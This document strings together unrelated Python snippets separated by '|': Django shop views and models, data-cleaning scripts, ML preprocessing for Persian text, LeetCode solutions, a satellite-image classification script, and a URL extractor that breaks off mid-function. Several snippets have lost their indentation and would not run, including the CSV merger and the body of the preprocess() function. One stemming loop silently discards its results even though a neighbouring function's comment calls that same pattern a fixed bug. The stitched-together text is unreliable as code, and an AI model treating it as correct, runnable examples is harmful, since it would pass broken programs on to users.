    # get_or_create above filters on complete=False, so this branch is
    # expected to always be taken; kept for safety.
    if not order.complete:
        show_order_items = True
        for item in items:
            # One image per product is flagged is_main; use its URL.
            imgs[item.id] = item.product.images.get(is_main=True).imageURL
    else:
        order = None
    context = {'show_order_items': show_order_items, 'order': order, 'imgs': imgs}
    return render(request, 'cart.html', context)
def checkout(request):
    """Render the checkout form and, on a valid POST, mark the order complete.

    Fixes over the original:
    - the discarded ``form.save(commit=False)`` call was dead code and is gone;
    - on validation errors the bound form (with error messages) is re-rendered
      instead of a fresh unbound ``CheckoutForm``.
    """
    device = request.COOKIES.get('device')
    customer, created = Customer.objects.get_or_create(device=device)
    order, created = Order.objects.get_or_create(customer=customer, complete=False)
    items = order.orderitem_set.all()
    total = sum(item.get_total for item in items)
    form = CheckoutForm(request.POST or None, instance=order)
    if request.method == 'POST' and form.is_valid():
        # Mark the instance complete before the form persists it.
        order.complete = True
        form.save()
        # Notify (e.g. e-mail/telegram) that a new order arrived.
        send_form(instance=order)
        success(request, 'Sifarisiniz qeydə alınmışdır gün ərzində sizinlə əlaqə saxlanılılacaq.')
        return redirect('index:home')
    context = {'items': items, 'form': form, 'total': total, 'order': order}
    return render(request, 'checkout.html', context)
|
import json


def main():
    """Reduce universities.json to (name, website) pairs and write the result
    to universities_formatted.json."""
    # Loading or opening the json file
    with open('universities.json') as sfile:
        file_data = json.load(sfile)

    new_data = []
    for item in file_data:
        # BUG FIX: the original did item.get("web_pages")[0], which raises
        # TypeError/IndexError when the key is missing or the list is empty.
        web_pages = item.get("web_pages") or []
        new_item = {
            "name": item.get("name"),
            "website": web_pages[0] if web_pages else None,
        }
        print(new_item)
        new_data.append(new_item)

    # Writing the reduced records out, pretty-printed.
    with open("universities_formatted.json", "w") as outfile:
        json.dump(new_data, outfile, indent=4)


if __name__ == "__main__":
    main()
|
import numpy as np
class SFT(object):
    """Similarity-based feature transform: replaces each embedding with a
    softmax-weighted average of all embeddings, weighted by cosine similarity
    scaled by a temperature ``sigma``."""

    def __init__(self, sigma=0.1):
        # Softmax temperature: smaller sigma -> sharper, more local averaging.
        self.sigma = sigma

    def __call__(self, emb_org):
        """Return the smoothed embeddings; ``emb_org`` is (n, d), output is (n, d)."""
        # L2-normalise rows (clip guards against division by zero rows).
        norms = np.linalg.norm(emb_org, 2, 1).reshape((-1, 1)).clip(min=1e-12)
        emb_unit = emb_org / norms
        # Pairwise cosine similarities, scaled by the temperature.
        W = np.matmul(emb_unit, emb_unit.T) / float(self.sigma)
        # Numerically stable row-wise softmax.
        # BUG FIX: the original subtracted np.max(W, axis=1) without
        # keepdims; that broadcasts the per-row maxima across COLUMNS, which
        # is not a per-row constant shift and changes the softmax result.
        W_exp = np.exp(W - np.max(W, axis=1, keepdims=True))
        T = W_exp / np.sum(W_exp, axis=1).reshape((-1, 1))
        # Convex combination of the ORIGINAL (un-normalised) embeddings.
        return np.matmul(T, emb_org)
import pickle
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
from Domain.BodyCollection import BodyCollection
import os
def get_embeddings(file) -> BodyCollection:
    """Deserialize and return the BodyCollection pickled at *file*."""
    with open(file, 'rb') as handle:
        return pickle.load(handle)
def TSNE_plot(data, classes, title):
    """Project *data* to 2-D with t-SNE and show a scatter plot coloured by *classes*."""
    projected = TSNE(n_components=2).fit_transform(data)
    plt.scatter(projected[:, 0], projected[:, 1], c=classes)
    plt.title(title)
    plt.show()
def saveBodyInformation(file: str, collection) -> None:
    """Pickle *collection* to *file* using the highest available protocol."""
    with open(file, 'wb') as sink:
        pickle.dump(collection, sink, pickle.HIGHEST_PROTOCOL)
if __name__ == '__main__':
    # Smooth the re-id embeddings of two sites with SFT and visualise each
    # with t-SNE. The save calls are intentionally commented out.
    sft_np_op = SFT(sigma=0.05)
    ps = "../data/TCG_alignedReId/ParqueSur.pkl"
    ay = "../data/TCG_alignedReId/Ayagaures.pkl"
    bc = get_embeddings(ps)
    emb,cls = bc.get_dataset()
    sft = sft_np_op(emb)
    print(cls)
    TSNE_plot(sft, cls, 'PS')
    bc.set_embeddings(sft)
    #saveBodyInformation(ps, bc)
    bc = get_embeddings(ay)
    emb,cls = bc.get_dataset()
    sft = sft_np_op(emb)
    TSNE_plot(sft, cls, 'AY')
    bc.set_embeddings(sft)
#saveBodyInformation(ay, bc) |
import os
from pyspark.sql import SparkSession
from pyspark.sql.functions import col, desc
if __name__ == "__main__":
    # Demo: the same departure-delays query expressed in Spark SQL and in the
    # DataFrame API.
    spark = SparkSession.builder.appName("SparkSQLExampleApp").getOrCreate()
    # Input CSV lives next to this script under ./data/.
    csv_file = f"{os.path.dirname(os.path.realpath(__file__))}/data/departuredelays.csv"
    df = (
        spark.read.format("csv")
        .option("inferSchema", "true")
        .option("header", "true")
        .load(csv_file)
    )
    # Assign name for table in spark sql
    df.createOrReplaceTempView("us_delay_flights_tbl")
    # Flights longer than 1000 miles, longest first.
    spark.sql(
        """SELECT distance, origin, destination FROM us_delay_flights_tbl
        WHERE distance > 1000 ORDER BY distance DESC"""
    ).show(10)
    # SFO -> ORD flights delayed by more than two hours.
    spark.sql(
        """SELECT date, delay, origin, destination
        FROM us_delay_flights_tbl
        WHERE delay > 120 AND ORIGIN = 'SFO' AND DESTINATION = 'ORD'
        ORDER BY delay DESC"""
    ).show(10)
    # Equivalent of the first SQL query via the DataFrame API.
    (
        df.select("distance", "origin", "destination")
        .where(col("distance") > 1000)
        .orderBy(desc("distance"))
    ).show(10)
|
from django import forms
# forms go here
class birthdayEmailForm(forms.Form):
    """Form for composing a birthday e-mail message (max 1000 characters)."""
    message = forms.CharField(widget=forms.Textarea, max_length=1000)
|
"""
Solution 1:
keep a stack, which is allways increasing.
each time it comes to a lower number x, compute area based on now idx and count, set all bigger int to x and push them back to stack s
Solution 2:
dp solution
keep a most left and most right dp array to keep the left and right bound for each point
trick point:
we cannot compare each point with all its left or right points.
We iteratively choose current point that need to compare. Each time cur pointer is point to a smaller number.
E.g. for left case:
cur = i - 1
while cur >= 0 and heights[cur] > heights[i]:
left[i] = left[cur]
cur = left[cur] - 1
"""
class Solution:
    def largestRectangleArea(self, heights):
        """Return the largest rectangle area in the histogram *heights*.

        Monotonic-stack solution, O(n) time / O(n) space. The stack holds
        (start_index, height) pairs with strictly increasing heights; when a
        lower bar arrives, every taller bar is popped and its area closed.

        Fixes over the original: the input list is no longer mutated (it
        appended a sentinel 0 to the caller's list), debug prints are gone,
        and there is no index-before-bounds-check hazard.

        :type heights: List[int]
        :rtype: int
        """
        if not heights:
            return 0
        best = 0
        stack = []  # (index this height extends back to, height)
        # Trailing sentinel 0 forces every bar to be popped by loop end.
        for i, h in enumerate(list(heights) + [0]):
            start = i
            while stack and stack[-1][1] > h:
                idx, height = stack.pop()
                best = max(best, height * (i - idx))
                # The shorter bar inherits the popped bar's left extent.
                start = idx
            stack.append((start, h))
        return best

    def largestRectangleArea_dp(self, heights):
        """DP variant: for each bar, find the leftmost/rightmost bound of the
        maximal span at least as tall as it, by jumping through the bounds of
        neighbouring bars (amortized O(n)).

        BUG FIX: the original used strict '>' comparisons, so runs of equal
        heights did not extend each other's bounds and e.g. [2, 2, 2]
        returned 2 instead of 6; '>=' handles equal heights correctly.

        :type heights: List[int]
        :rtype: int
        """
        n = len(heights)
        if n == 0:
            return 0
        left = list(range(n))               # left[i]: first index of bar i's span
        right = [i + 1 for i in range(n)]   # right[i]: one past the last index
        for i in range(1, n):
            cur = i - 1
            while cur >= 0 and heights[cur] >= heights[i]:
                left[i] = left[cur]
                cur = left[cur] - 1         # jump, don't step: amortized O(n)
        for j in range(n - 2, -1, -1):
            cur = j + 1
            while cur < n and heights[cur] >= heights[j]:
                right[j] = right[cur]
                cur = right[cur]
        return max(heights[i] * (right[i] - left[i]) for i in range(n))
# Demo: the expected answer for [2,1,5,6,2,3] is 10 (bars 5 and 6).
s = Solution()
print(s.largestRectangleArea_dp([2,1,5,6,2,3])) |
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 08 11:16:09 2016
@author: David
astro598algorithms lecture, file myprogram.py
"""
# Python 2 demo: add two complex numbers with the local mymath module.
import mymath
a = mymath.Complex(1.0,2.0)
b = mymath.Complex(3.0,4.0)
c = mymath.Complex.add(a,b)
# Expected: real 4.0, imag 6.0
print c.real
print c.imag |
class Solution:
    def cnt(self, s):
        """Count the decodings of *s* (a 1- or 2-character slice, digits or
        the wildcard '*', which stands for 1-9) as a SINGLE letter 1-26.

        Any other length yields 0.
        """
        if len(s) == 1:
            if s == "*":
                return 9        # any of 1-9
            return 0 if s == "0" else 1
        if len(s) != 2:
            return 0
        first, second = s[0], s[1]
        if first == "0":
            return 0            # no letter code starts with 0
        if first == "1":
            return 9 if second == "*" else 1   # 11-19, or the one pair 1d
        if first == "*":
            if second == "*":
                return 15       # 11-19 plus 21-26; '*' never represents 0
            return 2 if int(second) <= 6 else 1  # {1d, 2d} or just 1d
        if first == "2":
            if second == "*":
                return 6        # 21-26
            return 0 if int(second) > 6 else 1
        return 0                # first digit 3-9: no two-digit code

    def numDecodings(self, s):
        """Number of decodings of the digit/'*' string *s*, mod 1e9+7.

        DP over prefixes: ways(i+1) = ways(i)*cnt(s[i]) + ways(i-1)*cnt(s[i-1:i+1]).

        :type s: str
        :rtype: int
        """
        if not s:
            return 0
        if len(s) == 1:
            return self.cnt(s[0])
        MOD = 10 ** 9 + 7
        prev, cur = 1, self.cnt(s[0])   # ways for prefixes of length 0 and 1
        for i in range(1, len(s)):
            prev, cur = cur, (cur * self.cnt(s[i]) + prev * self.cnt(s[i - 1:i + 1])) % MOD
        return cur
|
from django.forms import ModelForm, inlineformset_factory
from .models import BillHeader, BillLines
class BillHeaderForm(ModelForm):
    """ModelForm for the bill header (issuer contact details)."""
    class Meta:
        model = BillHeader
        fields = ['company_name', 'street_address', 'city', 'state', 'phone', 'email']
BillLineFormSet = inlineformset_factory(BillHeader, BillLines, fields = ('description', 'quantity', 'unit_price')) |
from django.conf.urls.defaults import patterns, url
urlpatterns = patterns('shopapp.jingdong.views',
url(r'login/$', 'loginJD', name='login_jd'),
url(r'login/auth/$', 'loginAuthJD', name='login_auth_jd'),
) |
import csv
def nameParser(s):
    """Normalise an institution name for matching across datasets.

    Keeps letters, drops apostrophes entirely, and collapses every other run
    of non-letter characters into a single space (which may leave one
    trailing space). E.g. "Mass. Inst." -> "Mass Inst ".

    Rewritten without the original's C-style semicolons, building the result
    with a list + join instead of quadratic string concatenation.
    """
    parts = []
    pending_space = False  # a letter was seen; next non-letter emits one space
    for ch in s:
        if ch.isalpha():
            pending_space = True
            parts.append(ch)
        elif pending_space and ch != "'":
            parts.append(' ')
            pending_space = False
    return ''.join(parts)
writer = open("schoolByYear.csv", "w");
ratios = {};
salary = {};
schools = [];
with open('timesData.csv') as dFile:
reader = csv.reader(dFile, delimiter=',')
for row in reader:
processedName = nameParser(row[1]);
try:
ratios[processedName] = float(row[10]);
except :
continue;
with open('merged_school_data.csv') as schoolFile:
reader = csv.reader(schoolFile, delimiter=',')
for row in reader:
try:
name = nameParser(row[0]);
if name in ratios:
print(ratios[name]);
ratio = float(ratios[name]);
rank = row[6];
tuition = row[12];
control = row[16];
patent = row[17];
score = row[18];
year = row[19];
schools.append({"name":name, "rank":rank, "score":score,
"control":control, "tuition": tuition,
"patent":patent, "year":year, "ratio":ratio});
except:
continue;
# for school in info:
# school["coordinate"] = zips[str(int(school["zip"]))]
writer.write("name,rank,score,control,tuition,patent,year,ratio\n")
for school in schools:
writer.write(school["name"]+","+str(school["rank"])+","+str(school["score"])+","
+school["control"]+","+str(school["tuition"])+","+str(school["patent"])+","
+str(school["year"])+","+str(school["ratio"])+"\n");
writer.close()
|
from fastapi import FastAPI
from fastapi.middleware.gzip import GZipMiddleware
from fastapi.openapi.utils import get_openapi
from loguru import logger
from app.api.v1.api import api_router
from app.core import settings
from app.core.events import create_start_app_handler, create_stop_app_handler
from app.views import view_router
def create_app(add_event_handlers: bool = True) -> FastAPI:
    """Build and configure the FastAPI application.

    Sets up file logging, gzip compression, optional startup/shutdown
    handlers, the API and view routers, and a pre-computed OpenAPI schema.

    :param add_event_handlers: attach startup/shutdown handlers (disable in tests)
    :return: the configured application instance
    """
    logger.add(
        settings.LOG_FILE, level=settings.LOG_LEVEL, backtrace=settings.LOG_BACKTRACE
    )

    application = FastAPI(debug=settings.DEBUG, title=settings.PROJECT_NAME)

    # Compress responses larger than 1 KB.
    application.add_middleware(GZipMiddleware, minimum_size=1000)

    if add_event_handlers:
        application.add_event_handler("startup", create_start_app_handler(application))
        application.add_event_handler("shutdown", create_stop_app_handler(application))

    # Mount the versioned API and the HTML views.
    application.include_router(api_router, prefix="/api/v1")
    application.include_router(view_router)

    # Pre-compute the OpenAPI schema once instead of on first request.
    application.openapi_schema = get_openapi(
        title=settings.PROJECT_NAME,
        version=settings.VERSION,
        description=settings.DESCRIPTION,
        routes=application.routes,
    )
    return application


app = create_app()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 4 15:10:32 2018
@author: home
"""
# while val in nums:
# nums.remove(val)
# res = len(nums)
# return res
#def solution(nums, val):
# nums = list(filter(lambda x: x != val, nums))
# res = len(nums)
#
# return res
def solution(nums, val):
    """Return the count of elements in *nums* that are not equal to *val*.

    Builds a filtered copy; the input list is left unchanged. The debug
    print of the intermediate list was removed.
    """
    remaining = [element for element in nums if element != val]
    return len(remaining)
if __name__ == "__main__":
nums = [3, 2, 2, 3]
val = 3
i = 0
while i < solution(nums, val):
print(nums[i])
i += 1
|
from django.db import models
from accounts.models import User
# Create your models here.
class Animal(models.Model):
    """Top-level animal category (e.g. dog, cat)."""
    kind = models.CharField(max_length=100)
class Species(models.Model):
    """Breed/species within an Animal category."""
    species = models.CharField(max_length=100)
    animal = models.ForeignKey(Animal, on_delete=models.CASCADE, related_name="species")
class City(models.Model):
    """City where a lost-animal report was filed."""
    city = models.CharField(max_length=100)
class Borough(models.Model):
    """District ('gu') within a City."""
    gu = models.CharField(max_length=100)
    city = models.ForeignKey(City, on_delete=models.CASCADE, related_name="borough")
# (value, label) pairs for Article.gender.
gender_choice = (('Male', 'Male'), ('Female', 'Female'), ('Unknown', 'Unknown'))
class Article(models.Model):
    """A lost-animal report posted by a user."""
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="articles_lost")
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    title = models.CharField(max_length=100)
    name = models.CharField(max_length=100)  # the animal's name
    content = models.TextField()
    gender = models.CharField(max_length=100, choices=gender_choice)
    chip = models.BooleanField()  # whether the animal is microchipped
    age = models.CharField(max_length=100)
    city = models.ForeignKey(City, on_delete=models.CASCADE, related_name="articles_lost")
    borough = models.ForeignKey(Borough, on_delete=models.CASCADE, related_name="articles_lost")
    animal = models.ForeignKey(Animal, on_delete=models.CASCADE, related_name="articles_lost")
    species = models.ForeignKey(Species, on_delete=models.CASCADE, related_name="articles_lost")
    time = models.CharField(max_length=100)  # when the animal was lost (free text)
    image_url = models.TextField()
class Comment(models.Model):
    """A user comment on a lost-animal Article."""
    content = models.CharField(max_length=100)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="comments_lost")
    article = models.ForeignKey(Article, on_delete=models.CASCADE, related_name="comments_lost")
|
from __future__ import unicode_literals
import pickle
import pandas as pd
import numpy as np
from nltk.tokenize import word_tokenize
from nltk import pos_tag
from nltk.corpus import stopwords as stpwrd
from nltk.stem import WordNetLemmatizer
from sklearn.preprocessing import LabelEncoder
from sklearn import model_selection
from collections import defaultdict
from nltk.corpus import wordnet as wn
from sklearn.feature_extraction.text import TfidfVectorizer
from PersianStemmer import PersianStemmer
from hazm import *
from os.path import dirname, abspath ,join
import pickle
import random
# Project root (three levels up from this file); all data paths hang off it.
d = dirname(dirname(dirname(abspath(__file__)))) #set files directory path
#print(Test_X_Tfidf.shape)
#print(Tfidf_vect.vocabulary_)
# Build the combined stopword list: NLTK English stopwords plus several
# Persian lists shipped under <root>/stopwordlists.
#adding persian stopwords to nltk stopwords list:
stopwords = stpwrd.words('english')
persian = open(join(d,"stopwordlists","persian"),encoding="utf-8").read().splitlines()
nonverbal = open(join(d,"stopwordlists","nonverbal"),encoding="utf-8").read().splitlines()
short = open(join(d,"stopwordlists","short"),encoding="utf-8").read().splitlines()
verbal = open(join(d,"stopwordlists","verbal"),encoding="utf-8").read().splitlines()
chars = open(join(d,"stopwordlists","chars"),encoding="utf-8").read().splitlines()
stopwords.extend(persian)
stopwords.extend(nonverbal)
stopwords.extend(short)
stopwords.extend(verbal)
stopwords.extend(chars)
# Shared Persian stemmer; fixed seed for reproducible train/test splits.
ps = PersianStemmer()
np.random.seed(500)
def preprocess(dataset="preprocessed_data_set.csv", test_data_percent=0.25):
'''
####################################################################
#########################PREPROCESS SECTION#########################
####################################################################
'''
#Step by Step Tasks to prepare dataset for learning:
#Reading the dataset
Corpus = pd.read_csv(join(d,"files",dataset),encoding='utf-8')
#Remove blank rows if any.
Corpus['text'].dropna(inplace=True)
#Change all the text to lower case.
Corpus['text'] = [entry.lower() for entry in Corpus['text']]
#Normalize persian sentences
normalizer = Normalizer()
Corpus['text'] = [normalizer.normalize(entry) for entry in Corpus['text']]
#for entry in Corpus['text']:
# print(entry)
#Tokenization : In this each entry in the corpus will be broken into set of words
Corpus['text']= [word_tokenize(entry) for entry in Corpus['text']]
#Remove Stop words, Non-Numeric and perfom Word Stemming/Lemmenting.
#Persian words Stemming
for entry in Corpus['text']:
for token in entry:
token=ps.run(token)
#WordNetLemmatizer tagging
tag_map = defaultdict(lambda : wn.NOUN)
tag_map['J'] = wn.ADJ
tag_map['V'] = wn.VERB
tag_map['R'] = wn.ADV
for index,entry in enumerate(Corpus['text']):
Final_words = [] #output list
#Enlgish words lemmenting
word_Lemmatized = WordNetLemmatizer() # Initializing WordNetLemmatizer()
#pos_tag function below will provide the 'tag' i.e if the word is Noun(N) or Verb(V) or something else.
for word, tag in pos_tag(entry):
#check for Stop words and consider only alphabets
if word not in stopwords and word.isalpha():
word_Final = word_Lemmatized.lemmatize(word,tag_map[tag[0]])
Final_words.append(word_Final)
#The final processed set of words for each iteration will be stored in 'text_final'
Corpus.loc[index,'text_final'] = str(Final_words)
#Prepare train and test set for learning
Train_X, Test_X, Train_Y, Test_Y = model_selection.train_test_split(Corpus['text_final'],
Corpus['label'],test_size=test_data_percent)
#encoding labels to numbers
Encoder = LabelEncoder()
Train_Y = Encoder.fit_transform(Train_Y)
Test_Y = Encoder.fit_transform(Test_Y)
#Apply TFIDF method for vectorizing words
Tfidf_vect = TfidfVectorizer(max_features=10000)
Tfidf_vect.fit(Corpus['text_final'])
Train_X_Tfidf = Tfidf_vect.transform(Train_X)
Test_X_Tfidf = Tfidf_vect.transform(Test_X)
#save tfidf vectorizer
with open(join(d,"trained_models","tfidf_vectorizer_vocab.pkl"), 'wb') as filevec:
pickle.dump(Tfidf_vect.vocabulary_, filevec)
return Train_X_Tfidf, Train_Y , Test_X_Tfidf , Test_Y
def preprocess_input(input_str, transformer_in, vec_in):
    """Clean/stem/lemmatize the query dataset and TF-IDF-vectorize it with a
    previously fitted vocabulary.

    NOTE(review): *input_str* is never used - the function reads
    files/input_queries_dataset.csv instead; confirm intent with callers.

    :param transformer_in: TF-IDF transformer to apply
    :param vec_in: count vectorizer carrying the saved vocabulary
    :return: TF-IDF matrix for the query rows
    """
    transformer = transformer_in
    loaded_vec = vec_in
    ps = PersianStemmer()
    # Reading the query dataset.
    Corpus = pd.read_csv(join(d, "files", 'input_queries_dataset.csv'), encoding='utf-8')
    # Remove blank rows if any (see note in preprocess about dropna on a Series).
    Corpus['text'].dropna(inplace=True)
    Corpus['text'] = [entry.lower() for entry in Corpus['text']]
    # Normalize Persian sentences.
    normalizer = Normalizer()
    Corpus['text'] = [normalizer.normalize(entry) for entry in Corpus['text']]
    # Tokenize each entry into a list of words.
    Corpus['text'] = [word_tokenize(entry) for entry in Corpus['text']]
    # BUG FIX: the original stemming loop only rebound its loop variable;
    # actually apply the stemmer to every token.
    Corpus['text'] = [[ps.run(token) for token in entry] for entry in Corpus['text']]
    # Map Penn-Treebank tag prefixes to WordNet POS tags (default: noun).
    tag_map = defaultdict(lambda: wn.NOUN)
    tag_map['J'] = wn.ADJ
    tag_map['V'] = wn.VERB
    tag_map['R'] = wn.ADV
    word_Lemmatized = WordNetLemmatizer()  # hoisted out of the loop
    for index, entry in enumerate(Corpus['text']):
        Final_words = []
        for word, tag in pos_tag(entry):
            # keep only alphabetic non-stopwords
            if word not in stopwords and word.isalpha():
                Final_words.append(word_Lemmatized.lemmatize(word, tag_map[tag[0]]))
        Corpus.loc[index, 'text_final'] = str(Final_words)
    line = Corpus['text_final']
    # Vectorize using the saved vocabulary, then apply the TF-IDF transform.
    line_Tfidf = transformer.fit_transform(loaded_vec.fit_transform(line))
    return line_Tfidf
|
#!/usr/bin/env python
# encoding: utf-8
class read(object):
    """Reads an integer and reports on the sum of its decimal digits:
    the sum itself, its pinyin spelling, and its base-7 representation."""

    def __init__(self, num):
        self.num = int(num)
        self.sumup = 0  # digit sum, filled in by sum_up()

    def sum_up(self):
        """Compute the sum of self.num's decimal digits and print it."""
        number = self.num
        while int(number):
            self.sumup += number % 10
            number //= 10
        print("%d的各位数总和是%d" % (self.num, self.sumup))

    def print_out(self):
        """Print the digit sum spelled out in pinyin, digit by digit.

        BUG FIX: the original indexed a 1-9 table with (digit - 1), so a
        zero digit wrapped to index -1 and printed 'jiu'; the table now
        includes 'ling' for 0 and is indexed by the digit directly.
        """
        num_list = ['ling', 'yi', 'er', 'san', 'si', 'wu', 'liu', 'qi', 'ba', 'jiu']
        sumup = int(self.sumup)
        res = []
        while int(sumup):
            res.append(num_list[sumup % 10])
            sumup //= 10
        res.reverse()
        out = ' '.join(res)
        print("%d的拼音是%s" % (self.sumup, out))

    def change(self):
        """Print the digit sum converted to base 7."""
        base = 7
        res = []
        sumup = self.sumup
        while int(sumup):
            res.append(str(int(sumup) % base))
            sumup //= base
        res.reverse()
        out = ''.join(res)
        print("%d转化为7进制是%s" % (self.sumup, out))
if __name__ == '__main__' :
    # Prompt for a number, then print its digit sum, the digit sum's pinyin
    # spelling, and its base-7 form.
    number = read(input("输入一个尽可能长的数字\n"))
    number.sum_up()
    number.print_out()
    number.change()
|
def multiple3or5(n):
    """Return True if *n* is divisible by 3 or by 5."""
    # The comparison already yields a bool; no if/else needed.
    return n % 3 == 0 or n % 5 == 0
# Project Euler #1: sum of all multiples of 3 or 5 below 1000.
# Fixes: the accumulator no longer shadows the builtin `sum`, and the
# per-number "checking" debug print is gone.
total = sum(i for i in range(1, 1000) if multiple3or5(i))
print(total)
|
__author__ = 'timothyahong'
class BaseVolumeEstimator():
    """Marker base class for volume estimators."""
    pass


class SimpleVolumeEstimator(BaseVolumeEstimator):
    """Estimates liquid volume (ml) from rows of capacitive sensor readings."""

    def estimate(self, cap_values):
        """Transpose the per-sensor series into per-sample rows and map each
        row to an estimated volume."""
        return [self._determine_volume(sample) for sample in zip(*cap_values)]

    def _determine_volume(self, cap_value_row):
        """Sum a simple linear map (capped at 100 ml per sensor) over one row."""
        total = 0
        for reading in cap_value_row:
            # simple linear map up to 100 ml per sensor
            if reading < 10:
                total += 100 * (float(reading) / 10)
            else:
                total += 100
        return int(total)
# Enter your code here. Read input from STDIN. Print output to STDOUT
# Symmetric difference: print, in ascending order, the values that occur in
# exactly one of the two integer sets. Lines 1 and 3 (set sizes) are ignored.
_ = input()
first_set = set(map(int, input().split()))
_ = input()
second_set = set(map(int, input().split()))
for value in sorted(first_set ^ second_set):
    print(value)
|
from .rangerlars import RangerLars
# NOTE(review): this is a snippet, not a runnable module - `model`, `lr`,
# `weight_decay`, `adam_beta1` and `adam_beta2` must already be in scope
# wherever it is pasted. Confirm it is not imported directly.
optimizer = RangerLars(model.parameters(),
                       lr=lr,
                       weight_decay=weight_decay,
                       betas=(adam_beta1, adam_beta2),
                       )
|
import datetime
import os
from mongoengine import *
from course.models import Course
from user.models import Teacher
# Create your models here.
"""
资源实体类
"""
class Resource(Document):
    """A teaching resource (uploaded file) belonging to a course."""
    id = SequenceField(primary_key=True)  # auto-incrementing id
    name = StringField(max_length=100, default='资源标题')
    type = StringField(max_length=20, default='file', verbose_name='文件类型')
    # BUG FIX: the default must be a callable. The original passed the
    # RESULT of strftime(), which was evaluated once at import time, so every
    # document defaulted to the server start-up timestamp.
    upload_time = StringField(max_length=50, verbose_name='上传日期',
                              default=lambda: datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
    owner = ReferenceField(Teacher)  # the teacher who uploaded the resource
    size = StringField(max_length=20, verbose_name='文件大小')  # human-readable, KB/MB
    path = StringField(max_length=100, verbose_name='文件路径', null=False)
    download_count = IntField(default=0, verbose_name='下载次数')
    course = ReferenceField(Course)  # the course the resource belongs to
    meta = {'collection': 'resource'}  # MongoDB collection name

    @staticmethod
    def save_resource(file, course, owner):
        """Create or update the Resource record for an uploaded file.

        :param file: uploaded file object (exposes .name and .size in bytes)
        :param course: the Course the file belongs to
        :param owner: the uploading Teacher
        :return: None
        """
        file_type = os.path.splitext(file.name)[1][1:]  # extension without the dot, e.g. ppt/pdf
        # Human-readable size: KB below 1 MB, MB otherwise.
        if int(file.size / 1024) < 1024:
            file_size = str(round(file.size / 1024, 2)) + 'KB'
        else:
            file_size = str(round(file.size / 1024 / 1024, 2)) + 'MB'
        file_path = os.path.join(course.name, file.name)  # path relative to the course folder
        resource = Resource.objects.filter(path=file_path).first()
        if not resource:
            resource = Resource(name=file.name, type=file_type, size=file_size, owner=owner,
                                path=file_path, course=course)
        else:
            # Re-upload of an existing path: reset the counter, refresh metadata.
            resource.download_count = 0
            resource.size = file_size
            resource.upload_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        resource.save()
|
# python 3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 6 10:49:31 2019
@author: Prachi Singh
"""
import sys,os
import copy
import numpy as np
from scipy import misc
from scipy import ndimage
import matplotlib.pyplot as plt
from scipy.interpolate import UnivariateSpline
from scipy.optimize import curve_fit
import imageio
import numpy as np
import pandas as pd
from pylab import *
from PIL import Image
# from scipy.misc import imsave
# import matplotlib.pyplot as plt
# from sklearn.linear_model import LinearRegression
import csv
# import seaborn as sn
# from sklearn.metrics import confusion_matrix
# Input location: ./<district>District/*.tif files.
# NOTE(review): folderName is derived from this initial value only; the loop
# below rebinds `district` but never recomputes folderName - confirm this is
# intended for the single-city case.
district = 'Surat'
folderName = district.lower()+'District'
fileExtn = '.tif'
def calculate_thresholds(district, cost_array):
    """Return the cost threshold for classifying pixels.

    Currently a fixed constant; both arguments are accepted for interface
    compatibility but unused.
    """
    threshold = 1.95
    return threshold
all_cities_actual = []
all_cities_predicted = []
labels = [1,2,3,4]
cities = ['Surat']
# For each city: load the per-pixel cost array and the predicted raster,
# then relabel interior pixels (3x3 neighbourhood fully inside the mask) as
# non-built-up (255), built-up (200) or "changing" (100) based on the cost
# threshold; everything else is zeroed out.
for district in cities:
    print(district)
    cost_array = np.loadtxt('./'+folderName+'/_conv_gaus_removed_16_24N_cost_array.txt')
    cost_array = cost_array/1000
    threshold1 = calculate_thresholds(district, cost_array)
    string_threshold = "threshold 1:",threshold1
    print(string_threshold)
    band = imageio.imread('./'+folderName+'/'+district+'_prediction_temporal_'+str(2019)+fileExtn)
    data = band/240
    dims = band.shape
    band1 = band
    print (np.unique(data))
    # mask is 1 where the prediction is non-zero; convolving with a 3x3 box
    # of ones gives 9 exactly where the full neighbourhood is inside the mask.
    mask = np.sign(band)
    k = np.array([[1,1,1],[1,1,1],[1,1,1]])
    mask1 = ndimage.convolve(mask, k, mode='constant', cval=0.0)
    # iter walks cost_array in lockstep with the interior pixels (row-major).
    iter=0
    cbu = 0
    cnbu = 0
    changing = 0
    for j in range(0, dims[0]):
        for k in range(0, dims[1]):
            # NOTE(review): this k shadows the kernel array above; harmless
            # because the kernel was already consumed, but worth renaming.
            if (mask1[j][k] == 9):
                if (cost_array[iter]<=threshold1):
                    if data[j][k]==1:
                        band1[j][k] = 255
                        cnbu += 1
                    else:
                        band1[j][k] = 200
                        cbu += 1
                else:
                    changing += 1
                    band1[j][k] = 100
                iter += 1
            else:
                if(band1[j][k]!=0):
                    band1[j][k]=0
    # Percentage split of the three interior classes.
    total = cnbu+cbu+changing
    print((cnbu*100)/total, (cbu*100)/total, (changing*100)/total)
    print(np.unique(band1))
    imageio.imwrite('./'+folderName+'/'+district+'_prediction_temporal_mayank'+str(2019)+fileExtn, band1)
|
# Generated by Django 2.2.5 on 2019-11-11 11:20
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated by Django; alters patient.created_date.

    The hardcoded date default is the generator's snapshot of the value at
    makemigrations time - do not hand-edit generated migrations.
    """

    dependencies = [
        ('usermanagement', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='patient',
            name='created_date',
            field=models.DateField(default=datetime.date(2019, 11, 11), null=True),
        ),
    ]
|
from .character_error_rate import character_error_rate
from .word_error_rate import word_error_rate
|
#!/usr/bin/env python
# XXX: clean up.
# XXX: relative links to root are wrongly handled.
# XXX: use option parser.
# XXX: add template stuff
'extract urls from an html page'
import htmllib
import HTMLParser as xhtmllib
import os
import re
import sys
import urllib
from formatter import NullFormatter
def getSearchParser(badhtml, imgs):
    'get html parser'
    # Python 2 module. Choose the parser base: htmllib tolerates malformed
    # HTML, HTMLParser expects well-formed XHTML.
    if badhtml:
        HTMLParser = htmllib.HTMLParser
    else:
        HTMLParser = xhtmllib.HTMLParser
